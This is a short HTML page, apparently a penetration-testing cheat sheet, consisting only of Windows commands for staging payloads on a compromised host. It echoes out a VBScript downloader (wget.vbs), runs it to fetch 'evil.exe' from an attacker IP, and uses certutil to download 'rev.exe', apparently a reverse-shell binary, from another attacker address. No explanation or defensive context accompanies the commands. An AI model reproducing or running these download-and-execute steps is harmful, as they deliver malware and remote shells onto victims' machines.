<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>windows file transfer cscript</title>
</head><body>echo strUrl = WScript.Arguments.Item(0) &gt; wget.vbs<br/>
echo StrFile = WScript.Arguments.Item(1) &gt;&gt; wget.vbs<br/>
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 &gt;&gt; wget.vbs<br/>
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 &gt;&gt; wget.vbs<br/>
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 &gt;&gt; wget.vbs<br/>
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 &gt;&gt; wget.vbs<br/>
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts &gt;&gt; wget.vbs<br/>
echo Err.Clear &gt;&gt; wget.vbs<br/>
echo Set http = Nothing &gt;&gt; wget.vbs<br/>
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") &gt;&gt; wget.vbs<br/>
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") &gt;&gt; wget.vbs<br/>
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") &gt;&gt; wget.vbs<br/>
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") &gt;&gt; wget.vbs<br/>
echo http.Open "GET", strURL, False &gt;&gt; wget.vbs<br/>
echo http.Send &gt;&gt; wget.vbs<br/>
echo varByteArray = http.ResponseBody &gt;&gt; wget.vbs<br/>
echo Set http = Nothing &gt;&gt; wget.vbs<br/>
echo Set fs = CreateObject("Scripting.FileSystemObject") &gt;&gt; wget.vbs<br/>
echo Set ts = fs.CreateTextFile(StrFile, True) &gt;&gt; wget.vbs<br/>
echo strData = "" &gt;&gt; wget.vbs<br/>
echo strBuffer = "" &gt;&gt; wget.vbs<br/>
echo For lngCounter = 0 to UBound(varByteArray) &gt;&gt; wget.vbs<br/>
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) &gt;&gt; wget.vbs<br/>
echo Next &gt;&gt; wget.vbs<br/>
echo ts.Close &gt;&gt; wget.vbs<br/>
<br/>
<br/>
<br/>
cscript wget.vbs http://10.11.0.4/evil.exe evil.exe <br/>
<br/>
<br/>
certutil.exe -urlcache -split -f http://192.168.119.181:8001/rev.exe rev.exe<br/>
</body></html>